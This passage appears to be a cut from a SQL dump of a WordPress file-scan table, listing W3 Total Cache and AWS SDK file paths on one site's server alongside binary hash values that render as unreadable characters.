+\rO','',0,'?'),('j5q6aT(c','wp-content/plugins/w3-total-cache/pub/css/bootstrap-buttons.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/css/bootstrap-buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eCYڬ=bQ','\"nߗ\'UkY1Ql=RcH8j','',0,'?'),('z4Je6tqtǷ','wp-content/plugins/w3-total-cache/pub/css/error.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/css/error.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'p@\Z:[o{','\0rinwlɈM%','',0,'?'),('y z2.^','wp-content/plugins/w3-total-cache/pub/css/options.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/css/options.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','폋iIl/;','ddm.Q`HqAOТRG','',0,'?'),('b^G&5P4OM','wp-content/plugins/w3-total-cache/pub/css/popup.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/css/popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4/ӱyG`;D','qv:cwFB&ҸrJ','',0,'?'),('2}+?f','wp-content/plugins/w3-total-cache/pub/css/setup-guide.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/css/setup-guide.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T\rnH,^','\Z`sg&3h*@蓋zc𤪰\Z\'̡','',0,'?'),('yGR\r','wp-content/plugins/w3-total-cache/pub/fonts/w3tc.ttf','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/fonts/w3tc.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e R\'̀߬A','}5 _aKHliTFs','',0,'?'),('*kYׁ','wp-content/plugins/w3-total-cache/pub/fonts/w3tc.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/fonts/w3tc.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','','Bx)&%\0s`Xhx','',0,'?'),('v:bE5Y8,','wp-content/plugins/w3-total-cache/pub/img/W3TC_dashboard_logo_title-retina.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/W3TC_dashboard_logo_title-retina.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uێ;2','B6mع\0^Ny3!','',0,'?'),('NY]5(bП','wp-content/plugins/w3-total-cache/pub/img/W3TC_dashboard_logo_title.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/W3TC_dashboard_logo_title.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q^t4/Y}-','zŷeMԪydV{X):','',0,'?'),('\0f䏛QJ,t','wp-content/plugins/w3-total-cache/pub/img/button-grad-active.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/button-grad-active.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TU\r1.B','a@EEBvfAtB','',0,'?'),('Y`?D>/Q\\','wp-content/plugins/w3-total-cache/pub/img/button-grad.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/button-grad.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?%ܐV%b','xKqN .OU','',0,'?'),('*~NY^Ô%F̞','wp-content/plugins/w3-total-cache/pub/img/cdn-highwinds-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/cdn-highwinds-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jnUCkC','Od?dDmaJB#6@+TQwo','',0,'?'),('z3y9O)l','wp-content/plugins/w3-total-cache/pub/img/close.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/close.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','辅\nto5\Zk','Sh>=Y##67X:g','',0,'?'),('Wn.','wp-content/plugins/w3-total-cache/pub/img/google-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/google-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R;՘+ dz','lZ7*L/Bm*e\'_A_)','',0,'?'),('G@ϲ[2So','wp-content/plugins/w3-total-cache/pub/img/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('>/kpb^w%z','wp-content/plugins/w3-total-cache/pub/img/moon-bottom-left.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/moon-bottom-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w;]G?) I','qRc]3NTB@зT-\0J','',0,'?'),('Bz>@0D','wp-content/plugins/w3-total-cache/pub/img/moon-bottom-right.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/moon-bottom-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E|0\0Vmh','I0ў޾N [ϣ^9m$urbB','',0,'?'),('4>}xSǺmq','wp-content/plugins/w3-total-cache/pub/img/open.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/open.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fr^ع',']-Cʺk\nPa0sK|呐','',0,'?'),('뤱\r!{t(U,','wp-content/plugins/w3-total-cache/pub/img/overlay/ceo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/ceo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bd1','e}㥶 W$B0 feDhz\np#9','',0,'?'),('^O\"׸.).','wp-content/plugins/w3-total-cache/pub/img/overlay/gauge-bg-tp.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/gauge-bg-tp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=YbFZ0','6 fel2Ҹ٘>C4o ','',0,'?'),('ĵ gZ<ӿ','wp-content/plugins/w3-total-cache/pub/img/overlay/gray-check.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/gray-check.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ņ,&wh=h\\[','1تmÖXVzr*ܗ\n%','',0,'?'),('27+P','wp-content/plugins/w3-total-cache/pub/img/overlay/lite-gray-check.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/lite-gray-check.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<זR!FHx3p','j^i.ok\nTK`R+o','',0,'?'),('p[G.kw','wp-content/plugins/w3-total-cache/pub/img/overlay/lock.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/lock.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!<EHHt~','>VݵJs@ ìhQo','',0,'?'),('(9ƕ','wp-content/plugins/w3-total-cache/pub/img/overlay/overlay-close.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/overlay-close.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m-G-dCtl','HV|b꧓Ӻ ','',0,'?'),('\nmsהI|Zک','wp-content/plugins/w3-total-cache/pub/img/overlay/overlay-down-arrow.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/overlay-down-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yen$H','֩ՀC1a} ','',0,'?'),('-xA#^','wp-content/plugins/w3-total-cache/pub/img/overlay/overlay-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/overlay-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZqK4?ހ','$@\0֝no3j-V3ܟb','',0,'?'),('[7*Cð㟊\0H','wp-content/plugins/w3-total-cache/pub/img/overlay/save-close.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/save-close.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*N1ŊIP','\\t$>jk-|KuFԏh$w','',0,'?'),('\01 %.','wp-content/plugins/w3-total-cache/pub/img/overlay/select-arrow.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/select-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N?>\nʦ*L\r\r','?LnENݔ(_# ','',0,'?'),('2LT 4R=','wp-content/plugins/w3-total-cache/pub/img/overlay/twitter-bird-dark-bgs.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/twitter-bird-dark-bgs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\\orNe','N82guLȖ!','',0,'?'),('O%.}^lLuT}ک','wp-content/plugins/w3-total-cache/pub/img/overlay/wordpress-logo-simplified-rgb.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/overlay/wordpress-logo-simplified-rgb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y\\`M','~\rK\r6\0cnR?\"Fj䭰','',0,'?'),('\"8\0P \nu›U\0','wp-content/plugins/w3-total-cache/pub/img/ps_bar.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/ps_bar.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѳZ\rC','Nx4¼/b6ls>]OeMm','',0,'?'),('QuMI{=','wp-content/plugins/w3-total-cache/pub/img/ps_scores.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/ps_scores.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!BSэ','ݿ x-7b(td4X vz}]','',0,'?'),('svzPok!W','wp-content/plugins/w3-total-cache/pub/img/sidebar-background.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/sidebar-background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','afƽlu㫪]','Gl]%ԯ|TEbZo{߸','',0,'?'),('%7F Ȝ^','wp-content/plugins/w3-total-cache/pub/img/stats-bg.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/stats-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \n',' /Kss4#z\'$#e`l','',0,'?'),('`5s䊇G','wp-content/plugins/w3-total-cache/pub/img/transparent-comet-moon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/transparent-comet-moon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M{YB92K_EBG','\rC S>gcmD\\xSRe2G','',0,'?'),('EG役\"','wp-content/plugins/w3-total-cache/pub/img/transparent-comet.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/transparent-comet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"z5%RxTv','N2xf6YBZ(&CbK%','',0,'?'),('HkAU&?g','wp-content/plugins/w3-total-cache/pub/img/usage-statistics-widget.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/usage-statistics-widget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';eUх8혐','?*6W{t7D)]mR(jOhWAY','',0,'?'),('7Xf\0 ','wp-content/plugins/w3-total-cache/pub/img/w3tc_netdna-logo-retina.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/w3tc_netdna-logo-retina.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@vwIt:`]J','{V)e fxTR֚܊@p','',0,'?'),('}Io','wp-content/plugins/w3-total-cache/pub/img/w3tc_netdna-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/w3tc_netdna-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ηzε7k','`) \rϥ9I%Q塞+R{','',0,'?'),('|2','wp-content/plugins/w3-total-cache/pub/img/w3tc_newrelic-logo-retina.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/w3tc_newrelic-logo-retina.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jo)VmG5fԣh','EY- t\r%‡+','wp-content/plugins/w3-total-cache/pub/img/w3tc_swarmify-logo-retina.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/w3tc_swarmify-logo-retina.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʶ~3%lEg(Jj','ՠ{03P\Zj:NXSbC','',0,'?'),(' 7Xau','wp-content/plugins/w3-total-cache/pub/img/w3tc_swarmify-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/w3tc_swarmify-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\E \Z`Pb','k,~\'HvΘ\n`](}m\r','',0,'?'),('pmbvW ','wp-content/plugins/w3-total-cache/pub/img/w3tc_w3edge-logo-retina.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/img/w3tc_w3edge-logo-retina.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']=$E永',' x@qf&S U9QCփ','',0,'?'),('gֹ[0(%J','wp-content/plugins/w3-total-cache/pub/js/lazyload.version.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/js/lazyload.version.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9J_n=ZC','PoK$پ~%j@Q6\"Z3','',0,'?'),('!fY#\\X=z','wp-content/plugins/w3-total-cache/pub/js/lightbox.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/js/lightbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ԑ2fC','w;6L/ٿj: ї%m/\r','',0,'?'),('za7> ','wp-content/plugins/w3-total-cache/pub/js/metadata.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/js/metadata.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G_`+y.',')--kXavSɋybk[Me0','',0,'?'),('a1b;)HZQ\"','wp-content/plugins/w3-total-cache/pub/js/options-validator.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/js/options-validator.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','11/%xl\'','y+Q2zqߜ\rYoB87K','',0,'?'),('ϪШ_m>b#','wp-content/plugins/w3-total-cache/pub/js/options.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/js/options.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','axWRV:p','ac67 }\n=-Vn! \Z ڼB\0@SgĂ','',0,'?'),('=n)X+c','wp-content/plugins/w3-total-cache/pub/js/setup-guide.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/pub/js/setup-guide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rP7\r9U','C5\r|ElC̯:cmi6\0','wp-content/plugins/w3-total-cache/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T\0N..G','A%%Gd\nɸqeJ!Kg~ӎ\r','',0,'?'),('ᢻNWN5','wp-content/plugins/w3-total-cache/vendor/autoload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e¿-xj\'y\',Gb','t|%e  ަ`Viv H\"','',0,'?'),('*gr6','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/ISSUE_TEMPLATE/bug-report.yml','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/ISSUE_TEMPLATE/bug-report.yml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xڢ^<~r','l>!;<Ȉ=~ ҧn','',0,'?'),('%jO;d','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/ISSUE_TEMPLATE/config.yml','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/ISSUE_TEMPLATE/config.yml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\nJ>sk&:',' rbjܑ;]nBGgggrl;,N','',0,'?'),('5G҄ީHr','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/ISSUE_TEMPLATE/documentation.yml','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/ISSUE_TEMPLATE/documentation.yml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$mL`','=Ok&','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/PULL_REQUEST_TEMPLATE.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/PULL_REQUEST_TEMPLATE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׳nHmת$F%','0%JVhjԨVG\0D','',0,'?'),('?#l\nQWEP+','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/workflows/stale_issues.yml','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.github/workflows/stale_issues.yml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0@hh1әa','fzϺ]$2thk`tn鰯','',0,'?'),('R o*pAU','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.travis.yml','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/.travis.yml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϪI|z&ăǮ7','WfU۹ॎ . ˹tƃVA','',0,'?'),('$ fghPa׋','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/CODE_OF_CONDUCT.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/CODE_OF_CONDUCT.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nhiո1c','-)Sc$(髆 y7T+6)am.T','',0,'?'),('TdUq* Nb','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/CONTRIBUTING.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/CONTRIBUTING.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tghxt','7&U~+RDYjmXoh:1','',0,'?'),('e=pOաd','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/LICENSE.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JX+/*F','XҶN6qTX%IM-زjsޑ','',0,'?'),('#*!\'G','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/NOTICE.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/NOTICE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b1S2$[G-','ejB kS2KI; z #','',0,'?'),('6\\&2ۨ\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/README.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QF%ZC\Za','y4ZQ_,Mg&:lW','',0,'?'),('\'gL!2','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/composer.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','07XeDG ',',=$<I-% wQ=','',0,'?'),('}0b#2','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/phpunit.xml.dist','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/phpunit.xml.dist',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'+[tuTek\n','~VhyQ^`U¾,ZQ','',0,'?'),('F!,Sa\'ѽL','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/src/Exception/InvalidSnsMessageException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/src/Exception/InvalidSnsMessageException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^!+UblN','Km{\ZLp-GbME3\"!R','',0,'?'),('\'lh4u]','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/src/Message.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/src/Message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƃ@wΰV@E','7c냐ZW\0C/ZZ\'rX@Z','',0,'?'),('> ,L$','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/src/MessageValidator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/src/MessageValidator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C\ZɏE &; ','\"Aҵ]I;\"GŲYp=','',0,'?'),('h\'$2ט<7j','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/tests/FunctionalValidationsTest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/tests/FunctionalValidationsTest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r<Hطq','tazd~x~#>mB','',0,'?'),('m$))bS:q','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/tests/MessageTest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/tests/MessageTest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\PkoQU','6u<\'b\0$(Z.5)(U)','',0,'?'),('S~2r','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/tests/MessageValidatorTest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/tests/MessageValidatorTest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':e\rRh','s;\ZCIqȹ#]i','',0,'?'),('>1 w:','wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/tests/MockPhpStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-php-sns-message-validator/tests/MockPhpStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+`&H4;P:R ','ΜP,/Hy\Z\r-KcP+$b4','',0,'?'),('dJڒj:V','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/CODE_OF_CONDUCT.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/CODE_OF_CONDUCT.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mɨ!\r','-)Sc$(髆 y7T+6)am.T','',0,'?'),('y7=h}5','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/LICENSE.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JX+/*F','XҶN6qTX%IM-زjsޑ','',0,'?'),('i\Z mm\0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/NOTICE.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/NOTICE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<O\Zl',' Ǣp)_IzNIಫߦ;Jl~6','',0,'?'),('@dQlq2_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/composer.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';-([{9 -&L','\n[7lϹbr<~ch','',0,'?'),('\0q!N3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ACMPCA/ACMPCAClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ACMPCA/ACMPCAClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r3_ğR','۲sMe;\Z?~6E','',0,'?'),('Z:G','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ACMPCA/Exception/ACMPCAException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ACMPCA/Exception/ACMPCAException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OSS|P','µ/pg}','',0,'?'),('b#\"','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AccessAnalyzer/AccessAnalyzerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AccessAnalyzer/AccessAnalyzerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0EZG',')# ~$#xȮ>~Cոό݃,','',0,'?'),('xv:] sP1','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AccessAnalyzer/Exception/AccessAnalyzerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AccessAnalyzer/Exception/AccessAnalyzerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƥ\"1.','|N͵\Z\\.Z@/36H_pn','',0,'?'),('duZv!]\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Acm/AcmClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Acm/AcmClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S9RWc50hY','>?0XΈ^L63-vRON*\025t','',0,'?'),('՘q\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/XmlBody.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/XmlBody.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y(v\'cd ','z#HѯG{Zo` G[|<1','',0,'?'),('nm$TQŒ\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Service.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[a-`=!','޼!MUM2#0v,0Qr#V(Z=DKv','',0,'?'),('U$r{\'I','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Shape.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Shape.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}hYYQy','Rq\nT-…n\rg}','',0,'?'),('A\n 3C3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/ShapeMap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/ShapeMap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{es>i','',0,'?'),('K4 Bγ̓ ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/StructureShape.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/StructureShape.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3NAw+WsN)','!+j{&\\#\r4b%٠Z;','',0,'?'),(':8Bw|a 